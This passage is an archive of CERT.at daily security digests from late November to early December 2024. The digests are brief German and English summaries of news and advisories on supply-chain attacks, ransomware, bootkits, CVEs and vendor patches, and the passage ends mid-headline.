https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 04.12.2024
by Daily end-of-shift report 04 Dec '24

04 Dec '24

===================== = End-of-Day report = ===================== Timeframe: Dienstag 03-12-2024 18:00 − Mittwoch 04-12-2024 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Supply Chain Attack Detected in Solanas web3.js Library ∗∗∗ --------------------------------------------- A supply chain attack has been detected in versions 1.95.6 and 1.95.7 of the popular @solana/web3.js library, which receives more than ~350,000 weekly downloads on npm. These compromised versions contain injected malicious code that is designed to steal private keys from unsuspecting developers and users, potentially enabling attackers to drain cryptocurrency wallets. [..] npm has moved swiftly to remove the affected versions. [..] Anza recommends developers who suspect they were compromised to rotate any suspect authority keys, including multisigs, program authorities, and server keypairs. --------------------------------------------- https://socket.dev/blog/supply-chain-attack-solana-web3-js-library ∗∗∗ Jetzt patchen! Exploit für kritische Lücke in Whatsup Gold in Umlauf ∗∗∗ --------------------------------------------- Eine "kritische" Sicherheitslücke ist seit September dieses Jahres bekannt. Seitdem gibt es auch ein Sicherheitsupdate. Weil mittlerweile Exploitcode für die Schwachstelle kursiert, könnten Attacken bevorstehen. --------------------------------------------- https://heise.de/-10187538 ∗∗∗ Cisco Urges Immediate Patch for Decade-Old WebVPN Vulnerability ∗∗∗ --------------------------------------------- Cisco recently updated an advisory about a security flaw in the WebVPN login page of their ASA software, which can allow an unauthenticated, remote attacker to execute a cross-site scripting (XSS) attack on anyone using WebVPN on the Cisco ASA. [..] The vulnerability itself isn’t new – Cisco originally issued a warning back in March 2014. However, the company’s recent update highlights a concerning development: attackers are actively trying to exploit this decade-old bug. --------------------------------------------- https://hackread.com/cisco-patch-decade-old-webvpn-vulnerability/ ∗∗∗ (QR) Coding My Way Out of Here: C2 in Browser Isolation Environments ∗∗∗ --------------------------------------------- In this blog post, Mandiant demonstrates a novel technique that can be used to circumvent all three current types of browser isolation (remote, on-premises, and local) for the purpose of controlling a malicious implant via C2. Mandiant shows how attackers can use machine-readable QR codes to send commands from an attacker-controlled server to a victim device. --------------------------------------------- https://cloud.google.com/blog/topics/threat-intelligence/c2-browser-isolati… ∗∗∗ Wegem schwerem Cyberangriff auf US-Provider: FBI wirbt für Verschlüsselung ∗∗∗ --------------------------------------------- Angesichts eines verheerenden Cyberangriffs auf US-Provider haben die US-Bundespolizei FBI und die Cybersicherheitsbehörde CISA die Menschen in den Vereinigten Staaten aufgefordert, ihre Kommunikation möglichst zu verschlüsseln. --------------------------------------------- https://heise.de/-10187110 ∗∗∗ Black Basta Ransomware Campaign Drops Zbot, DarkGate, and Custom Malware ∗∗∗ --------------------------------------------- Beginning in early October, Rapid7 has observed a resurgence of activity related to the ongoing social engineering campaign being conducted by Black Basta ransomware operators. --------------------------------------------- https://www.rapid7.com/blog/post/2024/12/04/black-basta-ransomware-campaign… ∗∗∗ PROXY.AM Powered by Socks5Systemz Botnet ∗∗∗ --------------------------------------------- After a year long investigation, Bitsight TRACE follows up on Socks5Systemz research. --------------------------------------------- https://www.bitsight.com/blog/proxyam-powered-socks5systemz-botnet ∗∗∗ New era of slop security reports for open source ∗∗∗ --------------------------------------------- Recently I've noticed an uptick in extremely low-quality, spammy, and LLM-hallucinated security reports to open source projects. [..] Security reports that waste maintainers' time result in confusion, stress, frustration, and to top it off a sense of isolation due to the secretive nature of security reports. [..] If this is happening to a handful of projects that I have visibility for, then I suspect that this is happening on a large scale to open source projects. This is a very concerning trend. --------------------------------------------- https://sethmlarson.dev/slop-security-reports ===================== = Vulnerabilities = ===================== ∗∗∗ Identitätsmanagement: Sicherheitslücke mit Höchstwertung bedroht IdentityIQ ∗∗∗ --------------------------------------------- Bislang gibt es von SailPoint noch keine Warnung zur Sicherheitslücke. Alle Informationen zur "kritischen" Schwachstelle (CVE-2024-10905) basieren derzeit auf einem Eintrag in der National Vulnerability Database (NVD) des National Insitute of Standards and Technology (NIST). [..] Die Lücke soll in den Ausgaben 8.2p8, 8.3p5 und 8.4p2 geschlossen sein. --------------------------------------------- https://heise.de/-10187194 ∗∗∗ Cisco NX-OS Software Image Verification Bypass Vulnerability ∗∗∗ --------------------------------------------- A vulnerability in the bootloader of Cisco NX-OS Software could allow an unauthenticated attacker with physical access to an affected device, or an authenticated, local attacker with administrative credentials, to bypass NX-OS image signature verification. CVE-2024-20397 --------------------------------------------- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso… ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by Red Hat (go-toolset:rhel8, grafana, kernel, kernel-rt, kernel:4.18.0, pam, pam:1.5.1, pcs, postgresql:12, postgresql:15, postgresql:16, python3:3.6.8, qemu-kvm, rhc, rhc-worker-playbook, and virt:rhel and virt-devel:rhel) and SUSE (ansible-10, ansible-core, avahi, bpftool, python, python3, python36, webkit2gtk3, and xen). --------------------------------------------- https://lwn.net/Articles/1000721/ ∗∗∗ Scan2Net: Mehrere kritische Schwachstellen in Image Access Scan2Net ∗∗∗ --------------------------------------------- https://sec-consult.com/de/vulnerability-lab/advisory/mehrere-kritische-sch… ∗∗∗ PGST: Mehrere Schwachstellen in PGST-Alarmanlagen (SYSS-2024-070 bis -073) ∗∗∗ --------------------------------------------- https://www.syss.de/pentest-blog/mehrere-schwachstellen-in-pgst-alarmanlage… ∗∗∗ F5: K000148830: Linux kernel vulnerabilities CVE-2024-41090 and CVE-2024-41091 ∗∗∗ --------------------------------------------- https://my.f5.com/manage/s/article/K000148830 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 03.12.2024
by Daily end-of-shift report 03 Dec '24

03 Dec '24

===================== = End-of-Day report = ===================== Timeframe: Montag 02-12-2024 18:00 − Dienstag 03-12-2024 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Building Cyber Resilience Against Ransomware Attacks ∗∗∗ --------------------------------------------- This is the first blogpost in this series. Its aim is twofold: to enable organizations embarking on a journey to build resilience against ransomware to recognize common misconceptions hindering readiness efforts and offer a conceptual framework to guide effective resilience building. --------------------------------------------- https://blog.nviso.eu/2024/12/03/building-cyber-resilience-against-ransomwa… ∗∗∗ Unveiling RevC2 and Venom Loader ∗∗∗ --------------------------------------------- Venom Spider, also known as GOLDEN CHICKENS, is a threat actor known for offering Malware-as-a-Service (MaaS) tools like VenomLNK, TerraLoader, TerraStealer, and TerraCryptor. These tools have been utilized by other threat groups such as FIN6 and Cobalt in the past. Recently, Zscaler ThreatLabz uncovered two significant campaigns leveraging Venom Spider's MaaS tools between August and October 2024. During our investigation, we identified two new malware families, which we named RevC2 and Venom Loader, that were deployed using Venom Spider MaaS Tools. --------------------------------------------- https://www.zscaler.com/blogs/security-research/unveiling-revc2-and-venom-l… ∗∗∗ Gafgyt Malware Targeting Docker Remote API Servers ∗∗∗ --------------------------------------------- Our researchers identified threat actors exploiting misconfigured Docker servers to spread the Gafgyt malware. This threat traditionally targets IoT devices; this new tactic signals a change in its behavior. --------------------------------------------- https://www.trendmicro.com/en_us/research/24/l/gafgyt-malware-targeting-doc… ∗∗∗ Secure Coding: Sichere Fehlerbehandlung in Java – CWE-778-Risiken vermeiden ∗∗∗ --------------------------------------------- Mit sicheren Java-Design-Patterns wie dem Decorator und Proxy Pattern die Kontrolle über Fehlerberichte verbessern – zum Schutz gegen CWE-778-Schwachstellen. --------------------------------------------- https://heise.de/-10084007 ∗∗∗ On Almost Signing Android Builds ∗∗∗ --------------------------------------------- This blog post has two goals: to raise awareness about this issue, to introduce a script intended as a quick check to verify if an Android build was (incorrectly) signed with a known private key. When Android-based devices boot up, first the bootloader is verified to be running signed code, then the bootloader verifies the high-level operating system (HLOS). This blog post only covers the latter part. --------------------------------------------- https://www.nccgroup.com/us/research-blog/on-almost-signing-android-builds/ ∗∗∗ Extracting Files Embedded Inside Word Documents, (Tue, Dec 3rd) ∗∗∗ --------------------------------------------- I found a sample that is a Word document with an embedded executable. I'll explain how to extract the embedded executable with my tools. --------------------------------------------- https://isc.sans.edu/diary/rss/31486 ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (container-tools:rhel8, kernel, kernel-rt:4.18.0, kernel:4.18.0, pam, pam:1.5.1, perl-App-cpanminus, perl-App-cpanminus:1.7044, python-tornado, tigervnc, tuned, and webkit2gtk3), Debian (needrestart and webkit2gtk), Mageia (firefox, glib2.0, krb5, and thunderbird), Red Hat (firefox, postgresql, postgresql:12, postgresql:13, postgresql:15, postgresql:16, and thunderbird), SUSE (editorconfig-core-c, kernel, php7, php8, python, python-tornado6, python3-virtualenv, python310, python39, thunderbird, wget, and wireshark), and Ubuntu (firefox and haproxy). --------------------------------------------- https://lwn.net/Articles/1000591/ ∗∗∗ Zyxel security advisory for buffer overflow and post-authentication command injection vulnerabilities in some 4G LTE/5G NR CPE, DSL/Ethernet CPE, fiber ONTs, and WiFi extenders ∗∗∗ --------------------------------------------- CVE-2024-8748 ... could allow an attacker to cause denial of service (DoS) conditions against the web management interface [..] CVE-2024-9197 ... could allow an authenticated attacker with administrator privileges to cause DoS conditions against the web management interface [..] CVE-2024-9200 ... could allow an authenticated attacker with administrator privileges to execute operating system (OS) commands on a vulnerable device. --------------------------------------------- https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-… ∗∗∗ Patchday: Android 12, 13, 14 und 15 für Schadcode-Attacken anfällig ∗∗∗ --------------------------------------------- In einer Warnmeldung hebt Google eine Sicherheitslücke (CVE-2024-43767 "hoch") im System als besonders bedrohlich hervor: Angreifer können Schadcode ausführen. Dafür seien keine zusätzlichen Ausführungsrechte nötig. Wie so ein Angriff genau ablaufen könnte, bleibt aber unklar. --------------------------------------------- https://heise.de/-10185926 ∗∗∗ HPE: HPESBGN04760 rev.1 - HPE AutoPass License Server (APLS), Multiple Vulnerabilities ∗∗∗ --------------------------------------------- https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbgn04760en_us&doc… ∗∗∗ Fuji Electric Monitouch V-SFT ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-338-05 ∗∗∗ Fuji Electric Tellus Lite V-Simulator ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-338-06 ∗∗∗ ICONICS and Mitsubishi Electric GENESIS64 Products ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-338-04 ∗∗∗ Open Automation Software ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-338-03 ∗∗∗ Ruijie Reyee OS ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-338-01 ∗∗∗ F5: K000148809: Qt vulnerabilities CVE-2023-38197, CVE-2023-37369, and CVE-2023-32763 ∗∗∗ --------------------------------------------- https://my.f5.com/manage/s/article/K000148809 ∗∗∗ F5: K000148689: Qt vulnerability CVE-2023-32762 ∗∗∗ --------------------------------------------- https://my.f5.com/manage/s/article/K000148689 ∗∗∗ Veeam: Veeam Service Provider Console Vulnerability (CVE-2024-42448 | CVE-2024-42449) ∗∗∗ --------------------------------------------- https://www.veeam.com/kb4679 ∗∗∗ Veeam: Vulnerabilities Resolved in Veeam Backup & Replication 12.3 ∗∗∗ --------------------------------------------- https://www.veeam.com/kb4693 ∗∗∗ ZDI-24-1640: XnSoft XnView Classic RWZ File Parsing Integer Underflow Remote Code Execution Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-24-1640/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 02.12.2024
by Daily end-of-shift report 02 Dec '24

02 Dec '24

===================== = End-of-Day report = ===================== Timeframe: Freitag 29-11-2024 18:00 − Montag 02-12-2024 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Phishing: Angreifer umgehen Virenscan mittels beschädigter Word-Dokumente ∗∗∗ --------------------------------------------- Sicherheitsforscher sind auf eine neue Methode gestoßen, wie Cyberkriminelle präparierte Dokumente am Virenschutz vorbeischieben. --------------------------------------------- https://www.heise.de/-10184679 ∗∗∗ "Juice-Jacking": Wie gefährlich ist das Laden vom Smartphone im öffentlichen Raum? ∗∗∗ --------------------------------------------- Immer wieder warnen Behörden vor Angriffen durch manipulierte Charger, beim Cert Austria sieht man darin aber eine vorwiegend theoretische Bedrohung. --------------------------------------------- https://www.derstandard.at/story/3000000246594/juice-jacking-wie-gefaehrlic… ∗∗∗ Helldown, DoxNet & Darkrace Ransomware ∗∗∗ --------------------------------------------- In the following article I list some unique detection opportunities for all three ransomware groups, which seem to have the same affiliates or use the same server with similar ransomware variants to deploy their malware. --------------------------------------------- https://detect.fyi/helldown-donex-darktrace-ransomware-fd8683b7d135?source=… ∗∗∗ Code found online exploits LogoFAIL to install Bootkitty Linux backdoor ∗∗∗ --------------------------------------------- Researchers have discovered malicious code circulating in the wild that hijacks the earliest stage boot process of Linux devices by exploiting a year-old firmware vulnerability when it remains unpatched on affected models. [..] The ultimate objective of the exploit, which Binarly disclosed Friday, is to install Bootkitty, a bootkit for Linux that was found and reported on Wednesday by researchers from security firm ESET. --------------------------------------------- https://arstechnica.com/security/2024/11/code-found-online-exploits-logofai… ∗∗∗ Copilot: Administratorwissen zum Schutz der Daten ∗∗∗ --------------------------------------------- Microsoft hat ja damit begonnen, seine AI-Lösung Copilot in Microsoft Office-Anwendungen mit "Auto-Opt-in" an Kunden mit entsprechender Lizenz auszurollen. Administratoren kommt eine besondere Verantwortung zu, was den Schutz von Daten im Unternehmen betrifft. Microsoft hat dazu kürzlich einen Beitrag mit entsprechenden Hinweisen veröffentlicht. --------------------------------------------- https://www.borncity.com/blog/2024/12/01/copilot-was-administratoren-zum-sc… ∗∗∗ Cyber Resilience Act: Mehr Sicherheit für das Internet der Dinge ∗∗∗ --------------------------------------------- Der Cyber Resilience Act der EU soll vernetzte Geräte besser vor Angriffen aus dem Netz schützen. Unternehmen müssen ihn bis 2027 umsetzen. --------------------------------------------- https://www.golem.de/news/cyber-resilience-act-mehr-sicherheit-fuer-das-int… ∗∗∗ Digitale Bedrohungen: EU-Rat billigt Cyberschutzschild und Frühwarnsystem ∗∗∗ --------------------------------------------- Die EU-Staaten werden ein Cybersicherheitswarnsystem einrichten, mit dem sie Gefahren aus dem Internet quasi in Echtzeit erkennen und abwehren können wollen. --------------------------------------------- https://heise.de/-10185408 ∗∗∗ German intelligence launches task force to combat foreign election interference ∗∗∗ --------------------------------------------- Germanys domestic intelligence service (BfV) has created a special task force to counter cyberattacks, espionage, sabotage and disinformation campaigns ahead of federal elections in February. --------------------------------------------- https://therecord.media/german-bfv-election-task-force-cyberattacks-disinfo… ∗∗∗ Tamanoir: A KeyLogger using eBPF ∗∗∗ --------------------------------------------- Tamanoir is developed for educational purposes only. --------------------------------------------- https://github.com/pythops/tamanoir ∗∗∗ Webinar: Smartphone, Tablet & Co sicher nutzen! ∗∗∗ --------------------------------------------- Wie kann ich meine persönlichen Daten am Smartphone, Tablet & Co. schützen? In diesem Webinar zeigen wir Ihnen die wichtigsten Sicherheitseinstellungen – von Berechtigungen über Datenschutz bis hin zu Nutzungszeiten. Machen Sie mit unseren ExpertInnen Ihre digitalen Geräte sicher: Montag, 16. Dezember 2024, 18:30 - 20:00 Uhr via zoom. --------------------------------------------- https://www.watchlist-internet.at/news/webinar-smartphone-tablet-co-sicher-… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (dnsmasq, editorconfig-core, lemonldap-ng, proftpd-dfsg, python3.9, simplesamlphp, tgt, and xfpt), Fedora (qbittorrent, webkitgtk, and wireshark), Mageia (libsoup3 & libsoup), Red Hat (buildah, grafana, grafana-pcp, and podman), SUSE (gimp, kernel, postgresql14, python, webkit2gtk3, xen, and zabbix), and Ubuntu (ansible and postgresql-12, postgresql-14, postgresql-16). --------------------------------------------- https://lwn.net/Articles/1000465/ ∗∗∗ Multiple vulnerabilities in UNIVERGE IX/IX-R/IX-V series routers ∗∗∗ --------------------------------------------- https://jvn.jp/en/jp/JVN53958863/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 29.11.2024
by Daily end-of-shift report 29 Nov '24

29 Nov '24

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 28-11-2024 18:00 − Freitag 29-11-2024 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ So schützen Sie sich in der Weihnachtszeit vor Fake-Shops! ∗∗∗ --------------------------------------------- Zur Weihnachtszeit möchte man seinen Liebsten gerne eine Freude bereiten. Bei den kalten Temperaturen bietet es sich an, bequem von zu Hause aus online einzukaufen. Damit die Weihnachtsfreude nicht durch eine Bestellung bei einem Fake-Shop getrübt wird, zeigen wir Ihnen die wichtigsten Punkte, an denen Sie betrügerische Online-Shops erkennen können. --------------------------------------------- https://www.watchlist-internet.at/news/sicher-online-einkaufen-zu-weihnacht… ∗∗∗ Nach Nothalt: Microsoft verteilt korrigierte Exchange-Server-Updates ∗∗∗ --------------------------------------------- Das Exchange-Update zum November-Patchday war fehlerhaft, Microsoft zog die Notbremse. Jetzt stehen korrigierte Sicherheitsupdates bereit. --------------------------------------------- https://heise.de/-10181645 ∗∗∗ Hochriskante Sicherheitslücke in PostgreSQL: Gitlab patcht (noch) nicht ∗∗∗ --------------------------------------------- Postgres hat die Lücken bereits mit einem Update gefixt und empfiehlt, die Versionen 12.21, 13.17, 14.14, 15.9, 16.5 und 17.1 sofort einzuspielen. Wie bereits im März wiesen Leser uns darauf hin, dass GitLab nach wie vor an den alten, gefährdeten Versionen 14.11 und 16.4 festhält und die Updates verzögert. --------------------------------------------- https://heise.de/-10181730 ∗∗∗ QR-Codes an Parkautomaten – Polizei warnt vor Betrugsmasche ∗∗∗ --------------------------------------------- Derzeit tauchen bundesweit vermehrt manipulierte QR-Codes an Parkscheinautomaten auf. Dabei handelt es sich nach Angaben der Polizei um eine Betrugsmasche, bei der Kriminelle versuchen, über QR-Codes an sensible Daten zu gelangen – sogenanntes Quishing. --------------------------------------------- https://www.heise.de/-10181611 ∗∗∗ EU leitet Vertragsverletzungsverfahren gegen Deutschland wegen NIS2 ein ∗∗∗ --------------------------------------------- Gegen 24 Mitgliedstaaten inklusive Deutschland hat die Brüsseler Regierungsinstitution zugleich weitere Verletzungsverfahren gestartet, weil sie ihr keine nationalen Maßnahmen zur Umsetzung der Richtlinie über die Resilienz kritischer Einrichtungen mitgeteilt haben. Dabei handelt es sich quasi um die Analog-Variante der NIS2. --------------------------------------------- https://heise.de/-10181402 ∗∗∗ Ransomware Gangs Seek Pen Testers to Boost Quality ∗∗∗ --------------------------------------------- Qualified applicants must be able to test ransomware encryption and find bugs that might enable defenders to jailbreak the malware. --------------------------------------------- https://www.darkreading.com/threat-intelligence/ransomware-gangs-seek-pen-t… ∗∗∗ IT threat evolution Q3 2024 ∗∗∗ --------------------------------------------- In this part of the malware report we discuss the most remarkable findings of Q3 2024, including APT and hacktivist attacks, ransomware, stealers, macOS malware and so on. --------------------------------------------- https://securelist.com/malware-report-q3-2024/114678/ ∗∗∗ Race Condition Attacks against LLMs ∗∗∗ --------------------------------------------- In modern LLM systems, there is a lot of code between what you type and what the LLM receives, and between what the LLM produces and what you see. All of that code is exploitable, and I expect many more vulnerabilities to be discovered in the coming year. --------------------------------------------- https://www.schneier.com/blog/archives/2024/11/race-condition-attacks-again… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (firefox-esr, redis, twisted, and tzdata), Fedora (firefox, nss, pam, rust-rustls, rust-zlib-rs, thunderbird, tuned, and xen), and SUSE (cobbler, kernel, libjxl-devel, libuv, postgresql12, postgresql14, postgresql15, python-waitress, seamonkey, tomcat, and tomcat10). --------------------------------------------- https://lwn.net/Articles/1000185/ ∗∗∗ B&R: 2024-11-29: Cyber Security Advisory - B&R Authentication bypass flaw in several mapp components ∗∗∗ --------------------------------------------- https://www.br-automation.com/fileadmin/SA22P014-90c4aa35.pdf ∗∗∗ Windows Server 2012 Mark of the Web Vulnerability (0day) - and Free Micropatches for it ∗∗∗ --------------------------------------------- https://blog.0patch.com/2024/11/windows-server-2012-mark-of-web.html -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 28.11.2024
by Daily end-of-shift report 28 Nov '24

28 Nov '24

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 27-11-2024 18:00 − Donnerstag 28-11-2024 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Zello asks users to reset passwords after security incident ∗∗∗ --------------------------------------------- Zello is warning customers to reset their passwords if their account was created before November 2nd in what appears to be another security breach. --------------------------------------------- https://www.bleepingcomputer.com/news/security/zello-asks-users-to-reset-pa… ∗∗∗ Sneaky Skimmer Malware Targets Magento Sites Ahead of Black Friday ∗∗∗ --------------------------------------------- A stealthy JavaScript injection attack steals data from the checkout page of sites, either by creating a fake credit card form or extracting data directly from payment fields. --------------------------------------------- https://www.darkreading.com/application-security/sneaky-skimmer-malware-mag… ∗∗∗ Microsoft-Sicherheitsfunktion "Administrator Protection" jetzt ausprobierbar ∗∗∗ --------------------------------------------- Microsoft will die Windows-Bedienung sicherer machen. "Administrator Protection" soll vor unbefugten Admin-Zugriffen schützen. --------------------------------------------- https://www.heise.de/-10179558 ∗∗∗ Vorsicht vor gefälschte Paketbenachrichtigungen ∗∗∗ --------------------------------------------- Sie erwarten ein Paket? Vorsicht ist geboten! Derzeit kursieren zahlreiche gefälschte Benachrichtigungen über den Lieferstatus von Bestellungen. Prüfen Sie daher Nachrichten von Paketdiensten genau, um nicht in eine Phishing- oder Abo-Falle zu tappen. Wir zeigen Ihnen, wie Sie gefälschte Nachrichten erkennen. --------------------------------------------- https://www.watchlist-internet.at/news/falsche-paketbenachrichtigungen/ ∗∗∗ Malicious NPM Package Exploits React Native Documentation Example ∗∗∗ --------------------------------------------- A recent discovery revealed how official documentation can become an unexpected attack vector for supply chain attacks. It happened when an npm package called “rtn-centered-text” exploited an example from React Native’s Fabric Native Components guide in an attempt to trick developers into downloading their package, putting systems at risk. --------------------------------------------- https://checkmarx.com/blog/malicious-npm-package-exploits-react-native-docu… ∗∗∗ The Ultimate Handheld Hacking Device - My Experience with NetHunter ∗∗∗ --------------------------------------------- For those unfamiliar, Kali NetHunter is a version of Kali Linux that you can set up on your phone. There are several types of NetHunter setups, each determining the capabilities of your device. --------------------------------------------- https://andy.codes/blog/security_articles/2024-11-27-the-ultimate-handheld-… ===================== = Vulnerabilities = ===================== ∗∗∗ Sicherheitslecks in Entwicklerwerkzeug Jenkins gestopft ∗∗∗ --------------------------------------------- In der Sicherheitsmitteilung listen die Jenkins-Entwickler drei verwundbare Add-ons auf. Am schwersten wiegt die Schwachstelle im Simple Queue Plug-in. Es versieht Namen von Views nicht mit Escape. Das mündet in einer Stored-Cross-Site-Scripting-Lücke, die Angreifer mit "View/Create"-Rechten missbrauchen können (CVE-2024-54003, CVSS 8.0, Risiko "hoch"). Den Fehler korrigieren die Plug-in-Version 1.4.5 sowie neuere. --------------------------------------------- https://heise.de/-10180515 ∗∗∗ Multiple Vulnerabilities in Fuji Electric Products ZDI-24-1614 - ZDI-24-1630 ∗∗∗ --------------------------------------------- Mitigation: Given the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the application. --------------------------------------------- https://www.zerodayinitiative.com/advisories/published/ ∗∗∗ Drupal: Tarte au Citron - Moderately critical - Cross Site Scripting - SA-CONTRIB-2024-064 ∗∗∗ --------------------------------------------- https://www.drupal.org/sa-contrib-2024-064 ∗∗∗ ZABBIX: SQL injection in user.get API (CVE-2024-42327) Critical ∗∗∗ --------------------------------------------- https://support.zabbix.com/browse/ZBX-25623 ∗∗∗ NVIDIA Security Bulletin: NVIDIA UFM Enterprise, UFM Appliance, UFM CyberAI - November 2024 ∗∗∗ --------------------------------------------- https://nvidia.custhelp.com/app/answers/detail/a_id/5584 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 27.11.2024
by Daily end-of-shift report 27 Nov '24

27 Nov '24

===================== = End-of-Day report = ===================== Timeframe: Dienstag 26-11-2024 18:05 − Mittwoch 27-11-2024 18:00 Handler: Michael Schlagenhaufer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ RomCom exploits Firefox and Windows zero days in the wild ∗∗∗ --------------------------------------------- ESET Research details the analysis of a previously unknown vulnerability in Mozilla products exploited in the wild and another previously unknown Microsoft Windows vulnerability, combined in a zero-click exploit. --------------------------------------------- https://www.welivesecurity.com/en/eset-research/romcom-exploits-firefox-and… ∗∗∗ Betrug auf Telegram und WhatsApp mit Fake Job angeboten ∗∗∗ --------------------------------------------- Unterhalb finden Sie unseren Bericht des Telegram Betrugs und wie wir es sogar geschafft haben die Betrüger auszutricksen. Außerdem geben wir Ticks und Tricks, was Sie machen können und wie Sie solch einen Betrug erkennen. --------------------------------------------- https://www.zettasecure.com/post/betrug-auf-telegram-und-whatsapp-mit-fake-… ∗∗∗ Critical Flaw in ProjectSend Under Active Exploitation Against Public-Facing Servers ∗∗∗ --------------------------------------------- A critical security flaw impacting the ProjectSend open-source file-sharing application has likely come under active exploitation in the wild, according to findings from VulnCheck. The vulnerability, originally patched over a year-and-a-half ago as part of a commit pushed in May 2023 , was not officially made available until August 2024 with the release of version r1720. --------------------------------------------- https://thehackernews.com/2024/11/critical-flaw-in-projectsend-under.html ∗∗∗ Gaming Engines: An Undetected Playground for Malware Loaders ∗∗∗ --------------------------------------------- Check Point Research discovered a new technique taking advantage of Godot Engine, a popular open-source game engine, to execute crafted GDScript, code which triggers malicious commands and delivers malware. The technique remains undetected by almost all antivirus engines in VirusTotal. --------------------------------------------- https://research.checkpoint.com/2024/gaming-engines-an-undetected-playgroun… ∗∗∗ New NachoVPN attack uses rogue VPN servers to install malicious updates ∗∗∗ --------------------------------------------- A set of vulnerabilities dubbed "NachoVPN" allows rogue VPN servers to install malicious updates when unpatched Palo Alto and SonicWall SSL-VPN clients connect to them. --------------------------------------------- https://www.bleepingcomputer.com/news/security/new-nachovpn-attack-uses-rog… ∗∗∗ Rockstar 2FA Phishing-as-a-Service (PaaS): Noteworthy Email Campaigns ∗∗∗ --------------------------------------------- Welcome to the second part of our investigation into the Rockstar kit, please check out part one here. --------------------------------------------- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/rockstar-2f… ∗∗∗ Researchers Discover "Bootkitty" – First UEFI Bootkit Targeting Linux Kernels ∗∗∗ --------------------------------------------- Cybersecurity researchers have shed light on what has been described as the first Unified Extensible Firmware Interface (UEFI) bootkit designed for Linux systems. Dubbed Bootkitty by its creators who go by the name BlackCat, the bootkit is assessed to be a proof-of-concept (PoC) and there is no evidence that it has been put to use in real-world attacks. --------------------------------------------- https://thehackernews.com/2024/11/researchers-discover-bootkitty-first.html ∗∗∗ BEC-ware the Phish (part 3): Detect and Prevent Incidents in M365 ∗∗∗ --------------------------------------------- This blog discusses a few options in M365, such as guidance on configuring threat and alert policies and how to deal with these alerts downstream in the SIEM. --------------------------------------------- https://www.pentestpartners.com/security-blog/bec-ware-the-phish-part-3-det… ∗∗∗ Modern solutions against cross-site attacks ∗∗∗ --------------------------------------------- This article is about cross-site leak attacks and what recent defenses have been introduced to counter them. I also want to finally answer the question why web security best practices is always opt-in and finally how YOU can get increased security controls. --------------------------------------------- https://frederikbraun.de/modern-solutions-xsleaks.html ===================== = Vulnerabilities = ===================== ∗∗∗ Palo Alto Globalprotect: Schadcode-Lücke durch unzureichende Zertifikatsprüfung ∗∗∗ --------------------------------------------- Die Entdecker der Sicherheitslücke von Amberwolf schreiben in ihrer detaillierten Analyse, dass die Globalprotect-VPN-Clients sowohl unter macOS als auch unter Windows anfällig für das Ausführen von Schadcode aus dem Netz und der Ausweitung der Rechte sind, und zwar durch den automatischen Update-Mechanismus (CVE-2024-5921, CVSS-B 7.2, Risiko "hoch"). Zwar erfordert der Update-Prozess, dass MSI-Dateien signiert sind, jedoch können Angreifer den PanGPS-Dienst zum Installieren eines bösartigen, dadurch vertrautem Root-Zertifikat missbrauchen. --------------------------------------------- https://heise.de/-10178649 ∗∗∗ Microsoft patcht teils kritische Lücken außer der Reihe ∗∗∗ --------------------------------------------- Microsoft hat in der Nacht zum Mittwoch vier Sicherheitsmitteilungen veröffentlicht. [..] Einige Updates müssen Nutzer installieren. --------------------------------------------- https://www.heise.de/-10178400 ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (mpg123 and php8.2), Fedora (libsndfile, mingw-glib2, mingw-libsoup, mingw-python3, and qbittorrent), Oracle (pam:1.5.1 and perl-App-cpanminus), Red Hat (firefox, thunderbird, and webkit2gtk3), Slackware (mozilla), SUSE (firefox, rclone, tomcat, tomcat10, and xen), and Ubuntu (gh, libsoup2.4, libsoup3, pygments, TinyGLTF, and twisted). --------------------------------------------- https://lwn.net/Articles/999897/ ∗∗∗ GitLab Patch Release: 17.6.1, 17.5.3, 17.4.5 ∗∗∗ --------------------------------------------- https://about.gitlab.com/releases/2024/11/26/patch-release-gitlab-17-6-1-re… ∗∗∗ HPE Insight Remote Support: Monitoring-Software ermöglicht Codeschmuggel 